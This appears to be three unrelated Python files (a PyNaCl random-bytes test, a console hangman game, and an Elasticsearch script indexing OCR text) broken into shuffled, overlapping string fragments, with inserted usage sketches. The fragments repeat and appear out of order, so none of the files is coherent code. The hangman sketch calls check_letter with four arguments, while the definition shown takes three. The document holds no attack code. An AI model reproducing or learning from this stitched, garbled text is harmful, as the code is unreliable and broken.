# You may obtain a copy of the", "at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "for the specific language governing permissions and # limitations under", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY", "Copyright 2013 <NAME> and individual contributors # # Licensed under", "to in writing, software # distributed under the License is", "= ( b\"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba\" b\"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f\" b\"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf\" b\"982a1bb4587a5c970ff0810ca3b791d7e12\" ) seed = (", "assert str(nacl.secret.SecretBox(b\"\\x00\" * 32)) == str(b\"\\x00\" * 32) def test_deterministic_random_bytes():", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "# See the License for the specific language governing permissions", "import pytest import nacl.secret import nacl.utils def test_random_bytes_produces(): assert len(nacl.utils.random(16))", "with pytest.raises(TypeError) as e: nacl.utils.randombytes_deterministic(100, seed) assert expected in str(e.value)", "You may obtain a copy of the License at #", "may not use this file except in compliance with the", "or agreed to in writing, software # distributed under the", "and individual contributors # # Licensed under the Apache License,", "seed = b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\" with pytest.raises(TypeError) as e: nacl.utils.randombytes_deterministic(100, seed) assert", "required by applicable law or agreed to in writing, software", "BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "and # limitations under the License. import pytest import nacl.secret", "with the License. # You may obtain a copy of", "this file except in compliance with the License. # You", "nacl.utils def test_random_bytes_produces(): assert len(nacl.utils.random(16)) == 16 def test_random_bytes_produces_different_bytes(): assert", "the Apache License, Version 2.0 (the \"License\"); # you may", "test_deterministic_random_bytes(): expected = ( b\"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba\" b\"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f\" b\"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf\" b\"982a1bb4587a5c970ff0810ca3b791d7e12\" ) seed", "== str(b\"\\x00\" * 32) def test_deterministic_random_bytes(): expected = ( b\"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba\"", "nacl.utils.random(16) != nacl.utils.random(16) def test_string_fixer(): assert str(nacl.secret.SecretBox(b\"\\x00\" * 32)) ==", "<filename>tests/test_utils.py # Copyright 2013 <NAME> and individual contributors # #" ]
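# A minimal usage sketch (my addition, not part of the test file above;
# assumes a PyNaCl build where randombytes_deterministic is available).
# The point the tests make: the deterministic generator is reproducible
# from a 32-byte seed, while nacl.utils.random() is a fresh CSPRNG draw.
import nacl.utils

seed = b"\x01" * 32  # any 32 bytes work; this particular value is arbitrary
first = nacl.utils.randombytes_deterministic(16, seed)
second = nacl.utils.randombytes_deterministic(16, seed)
assert first == second                                 # same seed, same stream
assert nacl.utils.random(16) != nacl.utils.random(16)  # fresh randomness each call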
[ "1)] playing = True tries = 5 return [words, output,", "check_letter(letter, word, tries): correct = False for index, letter in", "{0} tries left.\".format(tries)) # print(\"DEBUG: word is {0}\".format(word)) if output", "[words, output, word, tries, playing] def check_finished(output, tries): if tries", "def check_finished(output, tries): if tries == 0: print(\"You ran out", "if letter == guess: output[index] = guess correct = True", "== guess: output[index] = guess correct = True if index", "= True tries = 5 return [words, output, word, tries,", "guess = str(input(\"Guess: \")) if len(guess) == 1: break except", "\"peach\", \"grape\", \"watermelon\"] output = [] word = words[random.randint(0, len(words)", "output, word, tries, playing] def check_finished(output, tries): if tries ==", "break print() guess = check_same(guess, output) tries = check_letter(guess, word,", "random def setup(): words = [\"banana\", \"apple\", \"orange\", \"peach\", \"grape\",", "tries == 1: print(\"You have {0} try left.\".format(tries)) else: print(\"You", "\"watermelon\"] output = [] word = words[random.randint(0, len(words) - 1)]", "print(\"You have {0} try left.\".format(tries)) else: print(\"You have {0} tries", "print_output(output) print() print() return True return False def check_letter(letter, word,", "len(output): print_output(output) print() print() return True return False def check_letter(letter,", "found that letter\") print() print_output(output) print() print() while True: guess", "if index == len(word) - 1: if not correct: print(\"Incorrect", "not correct: print(\"Incorrect guess\") print() return tries - 1 else:", "print_output(output) print() print() try: while True: guess = str(input(\"Guess: \"))", "== len(word) - 1: if not correct: print(\"Incorrect guess\") print()", "tries): choice = input(\"Do you want to play again ?", "if len(guess) == 1: break except (EOFError, KeyboardInterrupt): print() break", "letter != \"_\": count += 1 if count == len(output):", "output: if i == guess: same = True if same:", "n): \") print() if choice.lower().startswith(\"y\"): words, output, word, tries, playing", "print(\"_ \", end=\"\") else: print_output(output) print() print() try: while True:", "== \"__main__\": words, output, word, tries, playing = setup() while", "- 1: if not correct: print(\"Incorrect guess\") print() return tries", "check_same(guess, output): same = False for i in output: if", "word, tries, playing] def check_finished(output, tries): if tries == 0:", "return tries - 1 else: return tries def check_same(guess, output):", "else: print_output(output) print() print() try: while True: guess = str(input(\"Guess:", "return False def check_letter(letter, word, tries): correct = False for", "tries - 1 else: return tries def check_same(guess, output): same", "- 1 else: return tries def check_same(guess, output): same =", "guess else: return guess def print_output(output): for i in output:", "== guess: same = True if same: print(\"You already found", "want to play again ? (y or n): \") print()", "word, tries, playing = setup() while playing: print(\"Try to guess", "print() break except ValueError: print(\"Invalid guess\") break print() guess =", "if not correct: print(\"Incorrect guess\") print() return tries - 1", "= False for i in output: if i == guess:", "len(guess) == 1: break return guess else: return guess def", "already found that letter\") print() print_output(output) print() print() while True:", "enumerate(word): if letter == guess: output[index] = guess correct =", "again ? 
(y or n): \") print() if choice.lower().startswith(\"y\"): words,", "word:\") if tries == 1: print(\"You have {0} try left.\".format(tries))", "print() print() while True: guess = str(input(\"Guess: \")) if len(guess)", "print() return True count = 0 for letter in output:", "return True return False def check_letter(letter, word, tries): correct =", "= 5 return [words, output, word, tries, playing] def check_finished(output,", "[\"banana\", \"apple\", \"orange\", \"peach\", \"grape\", \"watermelon\"] output = [] word", "!= \"_\": count += 1 if count == len(output): print_output(output)", "print() print_output(output) print() print() while True: guess = str(input(\"Guess: \"))", "guess = str(input(\"Guess: \")) if len(guess) == 1: break return", "import random def setup(): words = [\"banana\", \"apple\", \"orange\", \"peach\",", "= setup() while playing: print(\"Try to guess the word:\") if", "index, letter in enumerate(word): if letter == guess: output[index] =", "print(\"Incorrect guess\") print() return tries - 1 else: return tries", "== []: for i in word: output.append(\"_\") for i in", "[]: for i in word: output.append(\"_\") for i in range(len(output)):", "i in range(len(output)): print(\"_ \", end=\"\") else: print_output(output) print() print()", "except (EOFError, KeyboardInterrupt): print() break except ValueError: print(\"Invalid guess\") break", "i in output: if i == guess: same = True", "/home/cha0snation/anaconda3/bin/python import random def setup(): words = [\"banana\", \"apple\", \"orange\",", "== 1: break return guess else: return guess def print_output(output):", "while playing: print(\"Try to guess the word:\") if tries ==", "output == []: for i in word: output.append(\"_\") for i", "correct = False for index, letter in enumerate(word): if letter", "= True if same: print(\"You already found that letter\") print()", "def check_letter(letter, word, tries): correct = False for index, letter", "that letter\") print() print_output(output) print() print() while True: guess =", "guess: output[index] = guess correct = True if index ==", "letter in output: if letter != \"_\": count += 1", "correct = True if index == len(word) - 1: if", "== len(output): print_output(output) print() print() return True return False def", "tries): correct = False for index, letter in enumerate(word): if", "{0}\".format(word)) if output == []: for i in word: output.append(\"_\")", "in range(len(output)): print(\"_ \", end=\"\") else: print_output(output) print() print() try:", "tries, playing = setup() while playing: print(\"Try to guess the", "print() print() return True return False def check_letter(letter, word, tries):", "print(\"You have {0} tries left.\".format(tries)) # print(\"DEBUG: word is {0}\".format(word))", "index == len(word) - 1: if not correct: print(\"Incorrect guess\")", "word is {0}\".format(word)) if output == []: for i in", "def check_same(guess, output): same = False for i in output:", "range(len(output)): print(\"_ \", end=\"\") else: print_output(output) print() print() try: while", "guess\") print() return tries - 1 else: return tries def", "return tries def check_same(guess, output): same = False for i", "\".format(i), end=\"\") if __name__ == \"__main__\": words, output, word, tries,", "have {0} tries left.\".format(tries)) # print(\"DEBUG: word is {0}\".format(word)) if", "for i in word: output.append(\"_\") for i in range(len(output)): print(\"_", "+= 1 if count == len(output): print_output(output) print() print() return", "True tries = 5 return [words, output, word, 
tries, playing]", "return guess else: return guess def print_output(output): for i in", "left.\".format(tries)) else: print(\"You have {0} tries left.\".format(tries)) # print(\"DEBUG: word", "end=\"\") else: print_output(output) print() print() try: while True: guess =", "guess\") break print() guess = check_same(guess, output) tries = check_letter(guess,", "str(input(\"Guess: \")) if len(guess) == 1: break return guess else:", "1: print(\"You have {0} try left.\".format(tries)) else: print(\"You have {0}", "# print(\"DEBUG: word is {0}\".format(word)) if output == []: for", "words = [\"banana\", \"apple\", \"orange\", \"peach\", \"grape\", \"watermelon\"] output =", "output, word, tries, playing = setup() while playing: print(\"Try to", "if i == guess: same = True if same: print(\"You", "print(\"You ran out of tries\") print() return True count =", "= input(\"Do you want to play again ? (y or", "guess correct = True if index == len(word) - 1:", "playing = True tries = 5 return [words, output, word,", "return True count = 0 for letter in output: if", "you want to play again ? (y or n): \")", "len(words) - 1)] playing = True tries = 5 return", "tries = 5 return [words, output, word, tries, playing] def", "= str(input(\"Guess: \")) if len(guess) == 1: break return guess", "break except ValueError: print(\"Invalid guess\") break print() guess = check_same(guess,", "0: print(\"You ran out of tries\") print() return True count", "if len(guess) == 1: break return guess else: return guess", "print(\"You already found that letter\") print() print_output(output) print() print() while", "= guess correct = True if index == len(word) -", "guess the word:\") if tries == 1: print(\"You have {0}", "to play again ? (y or n): \") print() if", "output[index] = guess correct = True if index == len(word)", "in enumerate(word): if letter == guess: output[index] = guess correct", "letter == guess: output[index] = guess correct = True if", "\", end=\"\") else: print_output(output) print() print() try: while True: guess", "\")) if len(guess) == 1: break except (EOFError, KeyboardInterrupt): print()", "letter in enumerate(word): if letter == guess: output[index] = guess", "len(guess) == 1: break except (EOFError, KeyboardInterrupt): print() break except", "tries\") print() return True count = 0 for letter in", "same = False for i in output: if i ==", "check_finished(output, tries): choice = input(\"Do you want to play again", "print() while True: guess = str(input(\"Guess: \")) if len(guess) ==", "letter\") print() print_output(output) print() print() while True: guess = str(input(\"Guess:", "else: print(\"You have {0} tries left.\".format(tries)) # print(\"DEBUG: word is", "tries, playing] def check_finished(output, tries): if tries == 0: print(\"You", "print() guess = check_same(guess, output) tries = check_letter(guess, word, tries)", "or n): \") print() if choice.lower().startswith(\"y\"): words, output, word, tries,", "= 0 for letter in output: if letter != \"_\":", "guess: same = True if same: print(\"You already found that", "print() try: while True: guess = str(input(\"Guess: \")) if len(guess)", "True return False def check_letter(letter, word, tries): correct = False", "print_output(output) print() print() while True: guess = str(input(\"Guess: \")) if", "if choice.lower().startswith(\"y\"): words, output, word, tries, playing = setup() else:", "\"__main__\": words, output, word, tries, playing = setup() while playing:", "\") print() if choice.lower().startswith(\"y\"): words, output, word, tries, 
playing =", "0 for letter in output: if letter != \"_\": count", "else: return tries def check_same(guess, output): same = False for", "True count = 0 for letter in output: if letter", "def print_output(output): for i in output: print(\"{0} \".format(i), end=\"\") if", "print(\"Try to guess the word:\") if tries == 1: print(\"You", "try: while True: guess = str(input(\"Guess: \")) if len(guess) ==", "\"orange\", \"peach\", \"grape\", \"watermelon\"] output = [] word = words[random.randint(0,", "playing] def check_finished(output, tries): if tries == 0: print(\"You ran", "True: guess = str(input(\"Guess: \")) if len(guess) == 1: break", "have {0} try left.\".format(tries)) else: print(\"You have {0} tries left.\".format(tries))", "for letter in output: if letter != \"_\": count +=", "count += 1 if count == len(output): print_output(output) print() print()", "in word: output.append(\"_\") for i in range(len(output)): print(\"_ \", end=\"\")", "False for index, letter in enumerate(word): if letter == guess:", "str(input(\"Guess: \")) if len(guess) == 1: break except (EOFError, KeyboardInterrupt):", "words, output, word, tries, playing = setup() while playing: print(\"Try", "== 1: print(\"You have {0} try left.\".format(tries)) else: print(\"You have", "word, tries): correct = False for index, letter in enumerate(word):", "setup(): words = [\"banana\", \"apple\", \"orange\", \"peach\", \"grape\", \"watermelon\"] output", "i == guess: same = True if same: print(\"You already", "== 0: print(\"You ran out of tries\") print() return True", "tries) if check_finished(output, tries): choice = input(\"Do you want to", "end=\"\") if __name__ == \"__main__\": words, output, word, tries, playing", "check_same(guess, output) tries = check_letter(guess, word, tries) if check_finished(output, tries):", "- 1)] playing = True tries = 5 return [words,", "print_output(output): for i in output: print(\"{0} \".format(i), end=\"\") if __name__", "if tries == 1: print(\"You have {0} try left.\".format(tries)) else:", "False for i in output: if i == guess: same", "if same: print(\"You already found that letter\") print() print_output(output) print()", "if output == []: for i in word: output.append(\"_\") for", "if letter != \"_\": count += 1 if count ==", "(EOFError, KeyboardInterrupt): print() break except ValueError: print(\"Invalid guess\") break print()", "for i in output: print(\"{0} \".format(i), end=\"\") if __name__ ==", "else: return guess def print_output(output): for i in output: print(\"{0}", "word = words[random.randint(0, len(words) - 1)] playing = True tries", "in output: if i == guess: same = True if", "output.append(\"_\") for i in range(len(output)): print(\"_ \", end=\"\") else: print_output(output)", "check_finished(output, tries): if tries == 0: print(\"You ran out of", "= check_same(guess, output) tries = check_letter(guess, word, tries) if check_finished(output,", "output: if letter != \"_\": count += 1 if count", "output) tries = check_letter(guess, word, tries) if check_finished(output, tries): choice", "len(word) - 1: if not correct: print(\"Incorrect guess\") print() return", "print(\"DEBUG: word is {0}\".format(word)) if output == []: for i", "play again ? 
(y or n): \") print() if choice.lower().startswith(\"y\"):", "count = 0 for letter in output: if letter !=", "1 if count == len(output): print_output(output) print() print() return True", "\"grape\", \"watermelon\"] output = [] word = words[random.randint(0, len(words) -", "same: print(\"You already found that letter\") print() print_output(output) print() print()", "tries def check_same(guess, output): same = False for i in", "setup() while playing: print(\"Try to guess the word:\") if tries", "count == len(output): print_output(output) print() print() return True return False", "False def check_letter(letter, word, tries): correct = False for index,", "return [words, output, word, tries, playing] def check_finished(output, tries): if", "5 return [words, output, word, tries, playing] def check_finished(output, tries):", "KeyboardInterrupt): print() break except ValueError: print(\"Invalid guess\") break print() guess", "1: break except (EOFError, KeyboardInterrupt): print() break except ValueError: print(\"Invalid", "out of tries\") print() return True count = 0 for", "tries = check_letter(guess, word, tries) if check_finished(output, tries): choice =", "for index, letter in enumerate(word): if letter == guess: output[index]", "playing = setup() while playing: print(\"Try to guess the word:\")", "? (y or n): \") print() if choice.lower().startswith(\"y\"): words, output,", "words, output, word, tries, playing = setup() else: playing =", "\"apple\", \"orange\", \"peach\", \"grape\", \"watermelon\"] output = [] word =", "try left.\".format(tries)) else: print(\"You have {0} tries left.\".format(tries)) # print(\"DEBUG:", "tries left.\".format(tries)) # print(\"DEBUG: word is {0}\".format(word)) if output ==", "same = True if same: print(\"You already found that letter\")", "guess def print_output(output): for i in output: print(\"{0} \".format(i), end=\"\")", "guess = check_same(guess, output) tries = check_letter(guess, word, tries) if", "= words[random.randint(0, len(words) - 1)] playing = True tries =", "True if index == len(word) - 1: if not correct:", "if __name__ == \"__main__\": words, output, word, tries, playing =", "= check_letter(guess, word, tries) if check_finished(output, tries): choice = input(\"Do", "output = [] word = words[random.randint(0, len(words) - 1)] playing", "= str(input(\"Guess: \")) if len(guess) == 1: break except (EOFError,", "input(\"Do you want to play again ? 
(y or n):", "if count == len(output): print_output(output) print() print() return True return", "tries): if tries == 0: print(\"You ran out of tries\")", "print() print() try: while True: guess = str(input(\"Guess: \")) if", "1: break return guess else: return guess def print_output(output): for", "words[random.randint(0, len(words) - 1)] playing = True tries = 5", "of tries\") print() return True count = 0 for letter", "= True if index == len(word) - 1: if not", "the word:\") if tries == 1: print(\"You have {0} try", "output, word, tries, playing = setup() else: playing = False", "in output: if letter != \"_\": count += 1 if", "1 else: return tries def check_same(guess, output): same = False", "left.\".format(tries)) # print(\"DEBUG: word is {0}\".format(word)) if output == []:", "for i in range(len(output)): print(\"_ \", end=\"\") else: print_output(output) print()", "ran out of tries\") print() return True count = 0", "to guess the word:\") if tries == 1: print(\"You have", "except ValueError: print(\"Invalid guess\") break print() guess = check_same(guess, output)", "return guess def print_output(output): for i in output: print(\"{0} \".format(i),", "(y or n): \") print() if choice.lower().startswith(\"y\"): words, output, word,", "output: print(\"{0} \".format(i), end=\"\") if __name__ == \"__main__\": words, output,", "check_letter(guess, word, tries) if check_finished(output, tries): choice = input(\"Do you", "[] word = words[random.randint(0, len(words) - 1)] playing = True", "choice.lower().startswith(\"y\"): words, output, word, tries, playing = setup() else: playing", "if tries == 0: print(\"You ran out of tries\") print()", "while True: guess = str(input(\"Guess: \")) if len(guess) == 1:", "if check_finished(output, tries): choice = input(\"Do you want to play", "ValueError: print(\"Invalid guess\") break print() guess = check_same(guess, output) tries", "= [\"banana\", \"apple\", \"orange\", \"peach\", \"grape\", \"watermelon\"] output = []", "for i in output: if i == guess: same =", "choice = input(\"Do you want to play again ? 
(y", "{0} try left.\".format(tries)) else: print(\"You have {0} tries left.\".format(tries)) #", "word, tries) if check_finished(output, tries): choice = input(\"Do you want", "\")) if len(guess) == 1: break return guess else: return", "print() return tries - 1 else: return tries def check_same(guess,", "== 1: break except (EOFError, KeyboardInterrupt): print() break except ValueError:", "print() return True return False def check_letter(letter, word, tries): correct", "i in output: print(\"{0} \".format(i), end=\"\") if __name__ == \"__main__\":", "in output: print(\"{0} \".format(i), end=\"\") if __name__ == \"__main__\": words,", "is {0}\".format(word)) if output == []: for i in word:", "break return guess else: return guess def print_output(output): for i", "def setup(): words = [\"banana\", \"apple\", \"orange\", \"peach\", \"grape\", \"watermelon\"]", "tries == 0: print(\"You ran out of tries\") print() return", "output): same = False for i in output: if i", "playing: print(\"Try to guess the word:\") if tries == 1:", "correct: print(\"Incorrect guess\") print() return tries - 1 else: return", "break except (EOFError, KeyboardInterrupt): print() break except ValueError: print(\"Invalid guess\")", "\"_\": count += 1 if count == len(output): print_output(output) print()", "__name__ == \"__main__\": words, output, word, tries, playing = setup()", "print(\"Invalid guess\") break print() guess = check_same(guess, output) tries =", "True if same: print(\"You already found that letter\") print() print_output(output)", "print() if choice.lower().startswith(\"y\"): words, output, word, tries, playing = setup()", "= [] word = words[random.randint(0, len(words) - 1)] playing =", "i in word: output.append(\"_\") for i in range(len(output)): print(\"_ \",", "word: output.append(\"_\") for i in range(len(output)): print(\"_ \", end=\"\") else:", "1: if not correct: print(\"Incorrect guess\") print() return tries -", "= False for index, letter in enumerate(word): if letter ==", "#! /home/cha0snation/anaconda3/bin/python import random def setup(): words = [\"banana\", \"apple\",", "print(\"{0} \".format(i), end=\"\") if __name__ == \"__main__\": words, output, word," ]
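# A quick non-interactive sketch (my addition; assumes the helpers above are
# in scope, with check_letter taking output explicitly) showing one round of
# guessing without the input() loop:
output = ["_"] * len("apple")
tries = check_letter("p", "apple", output, 5)
assert output == ["_", "p", "p", "_", "_"]  # both 'p' positions revealed
assert tries == 5                           # a correct guess costs no tries
tries = check_letter("z", "apple", output, tries)
assert tries == 4                           # a wrong guess costs one try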
[ "create ES client, create index es = Elasticsearch(hosts = [ES_HOST])", "txts_path = '%s/artdatis/tagging/OCRed/typed/' % DATA_PATH text_corpus = [] def corpus_iterator():", "out and collect text files for file_path in glob.glob(txts_path+'*_text.txt'): with", "\"text\": text, \"start_text\": start_text}, } print(\"Loaded %d documents\"%len(text_corpus)) from elasticsearch", "if es.indices.exists(INDEX_NAME): print(\"deleting '%s' index...\" % (INDEX_NAME)) res = es.indices.delete(index", "first characters for the doc preview LIMIT_START = 100 txts_path", "client, create index es = Elasticsearch(hosts = [ES_HOST]) if es.indices.exists(INDEX_NAME):", "size=2, body={\"query\": {\"match_all\": {}}}) print(\"results:\") for hit in res['hits']['hits']: print(hit[\"_source\"])", "data print(\"bulk indexing...\") bulk(es, corpus_iterator()) # sanity check res =", "text_corpus = [] def corpus_iterator(): # filter out and collect", "ES client, create index es = Elasticsearch(hosts = [ES_HOST]) if", "\"_type\": TYPE_NAME, \"_source\": {\"file_path\": path, \"text\": text, \"start_text\": start_text}, }", "\"_source\": {\"file_path\": path, \"text\": text, \"start_text\": start_text}, } print(\"Loaded %d", "= 100 txts_path = '%s/artdatis/tagging/OCRed/typed/' % DATA_PATH text_corpus = []", "def corpus_iterator(): # filter out and collect text files for", "', text) start_text = text.lstrip()[:LIMIT_START] with open(file_path.split('_text.txt')[0]+'_path.txt') as path_file: path", "text_corpus: text_corpus.append(text) text = re.sub(' +', ' ', text) start_text", "es.indices.create(index = INDEX_NAME, body = request_body) print(\" response: '%s'\" %", "files for file_path in glob.glob(txts_path+'*_text.txt'): with open(file_path, encoding=\"utf-8\") as file:", "with open(file_path, encoding=\"utf-8\") as file: text = file.read() # filter", "= [ES_HOST]) if es.indices.exists(INDEX_NAME): print(\"deleting '%s' index...\" % (INDEX_NAME)) res", "8, 2019 .. codeauthor: <NAME> <<EMAIL>> Index docs into ES", "elasticsearch import Elasticsearch from elasticsearch.helpers import bulk # create ES", "elasticsearch.helpers import bulk # create ES client, create index es", "= '%s/artdatis/tagging/OCRed/typed/' % DATA_PATH text_corpus = [] def corpus_iterator(): #", "open(file_path, encoding=\"utf-8\") as file: text = file.read() # filter duplicates", "res = es.indices.create(index = INDEX_NAME, body = request_body) print(\" response:", "request_body) print(\" response: '%s'\" % (res)) # bulk index the", "''' Created on Dec 8, 2019 .. 
codeauthor: <NAME> <<EMAIL>>", "index the data print(\"bulk indexing...\") bulk(es, corpus_iterator()) # sanity check", "docs into ES https://qbox.io/blog/building-an-elasticsearch-index-with-python ''' from settings import * import", "https://qbox.io/blog/building-an-elasticsearch-index-with-python ''' from settings import * import glob import re", "text_corpus.append(text) text = re.sub(' +', ' ', text) start_text =", "index...\" % (INDEX_NAME)) res = es.indices.delete(index = INDEX_NAME) print(\" response:", "text not in text_corpus: text_corpus.append(text) text = re.sub(' +', '", "= { \"settings\" : { \"number_of_shards\": 1, \"number_of_replicas\": 0 }", "print(\"Loaded %d documents\"%len(text_corpus)) from elasticsearch import Elasticsearch from elasticsearch.helpers import", "es.indices.exists(INDEX_NAME): print(\"deleting '%s' index...\" % (INDEX_NAME)) res = es.indices.delete(index =", "for file_path in glob.glob(txts_path+'*_text.txt'): with open(file_path, encoding=\"utf-8\") as file: text", "request_body = { \"settings\" : { \"number_of_shards\": 1, \"number_of_replicas\": 0", "from settings import * import glob import re # n", "} print(\"Loaded %d documents\"%len(text_corpus)) from elasticsearch import Elasticsearch from elasticsearch.helpers", "bulk # create ES client, create index es = Elasticsearch(hosts", "(res)) # bulk index the data print(\"bulk indexing...\") bulk(es, corpus_iterator())", "print(\" response: '%s'\" % (res)) # bulk index the data", "import * import glob import re # n first characters", "res = es.indices.delete(index = INDEX_NAME) print(\" response: '%s'\" % (res))", "#!/usr/bin/env python # -*- coding: utf-8 -*- ''' Created on", "%d documents\"%len(text_corpus)) from elasticsearch import Elasticsearch from elasticsearch.helpers import bulk", "characters for the doc preview LIMIT_START = 100 txts_path =", "Elasticsearch(hosts = [ES_HOST]) if es.indices.exists(INDEX_NAME): print(\"deleting '%s' index...\" % (INDEX_NAME))", "text files for file_path in glob.glob(txts_path+'*_text.txt'): with open(file_path, encoding=\"utf-8\") as", "res = es.search(index = INDEX_NAME, size=2, body={\"query\": {\"match_all\": {}}}) print(\"results:\")", "start_text}, } print(\"Loaded %d documents\"%len(text_corpus)) from elasticsearch import Elasticsearch from", "= INDEX_NAME) print(\" response: '%s'\" % (res)) request_body = {", "<<EMAIL>> Index docs into ES https://qbox.io/blog/building-an-elasticsearch-index-with-python ''' from settings import", "'%s/artdatis/tagging/OCRed/typed/' % DATA_PATH text_corpus = [] def corpus_iterator(): # filter", "filter out and collect text files for file_path in glob.glob(txts_path+'*_text.txt'):", "INDEX_NAME) print(\" response: '%s'\" % (res)) request_body = { \"settings\"", "\"number_of_shards\": 1, \"number_of_replicas\": 0 } } print(\"creating '%s' index...\" %", "-*- coding: utf-8 -*- ''' Created on Dec 8, 2019", "% (INDEX_NAME)) res = es.indices.delete(index = INDEX_NAME) print(\" response: '%s'\"", "[ES_HOST]) if es.indices.exists(INDEX_NAME): print(\"deleting '%s' index...\" % (INDEX_NAME)) res =", "file_path in glob.glob(txts_path+'*_text.txt'): with open(file_path, encoding=\"utf-8\") as file: text =", "print(\"deleting '%s' index...\" % (INDEX_NAME)) res = es.indices.delete(index = INDEX_NAME)", "if text not in text_corpus: text_corpus.append(text) text = re.sub(' +',", "print(\"bulk indexing...\") bulk(es, corpus_iterator()) # sanity check res = es.search(index", "es.indices.delete(index = INDEX_NAME) print(\" response: 
'%s'\" % (res)) request_body =", "and collect text files for file_path in glob.glob(txts_path+'*_text.txt'): with open(file_path,", "'%s'\" % (res)) request_body = { \"settings\" : { \"number_of_shards\":", "as file: text = file.read() # filter duplicates if text", "(INDEX_NAME)) res = es.indices.create(index = INDEX_NAME, body = request_body) print(\"", "\"settings\" : { \"number_of_shards\": 1, \"number_of_replicas\": 0 } } print(\"creating", "# create ES client, create index es = Elasticsearch(hosts =", "glob import re # n first characters for the doc", "for the doc preview LIMIT_START = 100 txts_path = '%s/artdatis/tagging/OCRed/typed/'", "text) start_text = text.lstrip()[:LIMIT_START] with open(file_path.split('_text.txt')[0]+'_path.txt') as path_file: path =", "\"_index\": INDEX_NAME, \"_type\": TYPE_NAME, \"_source\": {\"file_path\": path, \"text\": text, \"start_text\":", "= es.indices.delete(index = INDEX_NAME) print(\" response: '%s'\" % (res)) request_body", "% (res)) request_body = { \"settings\" : { \"number_of_shards\": 1,", "# -*- coding: utf-8 -*- ''' Created on Dec 8,", "# filter duplicates if text not in text_corpus: text_corpus.append(text) text", "es = Elasticsearch(hosts = [ES_HOST]) if es.indices.exists(INDEX_NAME): print(\"deleting '%s' index...\"", "INDEX_NAME, body = request_body) print(\" response: '%s'\" % (res)) #", "LIMIT_START = 100 txts_path = '%s/artdatis/tagging/OCRed/typed/' % DATA_PATH text_corpus =", "yield { \"_index\": INDEX_NAME, \"_type\": TYPE_NAME, \"_source\": {\"file_path\": path, \"text\":", "coding: utf-8 -*- ''' Created on Dec 8, 2019 ..", "} } print(\"creating '%s' index...\" % (INDEX_NAME)) res = es.indices.create(index", "ES https://qbox.io/blog/building-an-elasticsearch-index-with-python ''' from settings import * import glob import", "re.sub(' +', ' ', text) start_text = text.lstrip()[:LIMIT_START] with open(file_path.split('_text.txt')[0]+'_path.txt')", "# n first characters for the doc preview LIMIT_START =", "# bulk index the data print(\"bulk indexing...\") bulk(es, corpus_iterator()) #", "utf-8 -*- ''' Created on Dec 8, 2019 .. 
codeauthor:", "from elasticsearch import Elasticsearch from elasticsearch.helpers import bulk # create", "open(file_path.split('_text.txt')[0]+'_path.txt') as path_file: path = path_file.read().strip().replace(DATA_PATH, '/images') yield { \"_index\":", "% (res)) # bulk index the data print(\"bulk indexing...\") bulk(es,", "doc preview LIMIT_START = 100 txts_path = '%s/artdatis/tagging/OCRed/typed/' % DATA_PATH", "path_file.read().strip().replace(DATA_PATH, '/images') yield { \"_index\": INDEX_NAME, \"_type\": TYPE_NAME, \"_source\": {\"file_path\":", "body = request_body) print(\" response: '%s'\" % (res)) # bulk", "'%s'\" % (res)) # bulk index the data print(\"bulk indexing...\")", "= text.lstrip()[:LIMIT_START] with open(file_path.split('_text.txt')[0]+'_path.txt') as path_file: path = path_file.read().strip().replace(DATA_PATH, '/images')", "Elasticsearch from elasticsearch.helpers import bulk # create ES client, create", "collect text files for file_path in glob.glob(txts_path+'*_text.txt'): with open(file_path, encoding=\"utf-8\")", "codeauthor: <NAME> <<EMAIL>> Index docs into ES https://qbox.io/blog/building-an-elasticsearch-index-with-python ''' from", "INDEX_NAME, \"_type\": TYPE_NAME, \"_source\": {\"file_path\": path, \"text\": text, \"start_text\": start_text},", ": { \"number_of_shards\": 1, \"number_of_replicas\": 0 } } print(\"creating '%s'", "corpus_iterator(): # filter out and collect text files for file_path", "filter duplicates if text not in text_corpus: text_corpus.append(text) text =", "sanity check res = es.search(index = INDEX_NAME, size=2, body={\"query\": {\"match_all\":", "2019 .. codeauthor: <NAME> <<EMAIL>> Index docs into ES https://qbox.io/blog/building-an-elasticsearch-index-with-python", "* import glob import re # n first characters for", "[] def corpus_iterator(): # filter out and collect text files", "+', ' ', text) start_text = text.lstrip()[:LIMIT_START] with open(file_path.split('_text.txt')[0]+'_path.txt') as", "n first characters for the doc preview LIMIT_START = 100", "-*- ''' Created on Dec 8, 2019 .. 
codeauthor: <NAME>", "path = path_file.read().strip().replace(DATA_PATH, '/images') yield { \"_index\": INDEX_NAME, \"_type\": TYPE_NAME,", "from elasticsearch.helpers import bulk # create ES client, create index", "indexing...\") bulk(es, corpus_iterator()) # sanity check res = es.search(index =", "text = file.read() # filter duplicates if text not in", "import glob import re # n first characters for the", "{ \"number_of_shards\": 1, \"number_of_replicas\": 0 } } print(\"creating '%s' index...\"", "in glob.glob(txts_path+'*_text.txt'): with open(file_path, encoding=\"utf-8\") as file: text = file.read()", "in text_corpus: text_corpus.append(text) text = re.sub(' +', ' ', text)", "= re.sub(' +', ' ', text) start_text = text.lstrip()[:LIMIT_START] with", "# sanity check res = es.search(index = INDEX_NAME, size=2, body={\"query\":", "settings import * import glob import re # n first", "text = re.sub(' +', ' ', text) start_text = text.lstrip()[:LIMIT_START]", "' ', text) start_text = text.lstrip()[:LIMIT_START] with open(file_path.split('_text.txt')[0]+'_path.txt') as path_file:", "= file.read() # filter duplicates if text not in text_corpus:", "import bulk # create ES client, create index es =", "es.search(index = INDEX_NAME, size=2, body={\"query\": {\"match_all\": {}}}) print(\"results:\") for hit", "1, \"number_of_replicas\": 0 } } print(\"creating '%s' index...\" % (INDEX_NAME))", "= request_body) print(\" response: '%s'\" % (res)) # bulk index", "preview 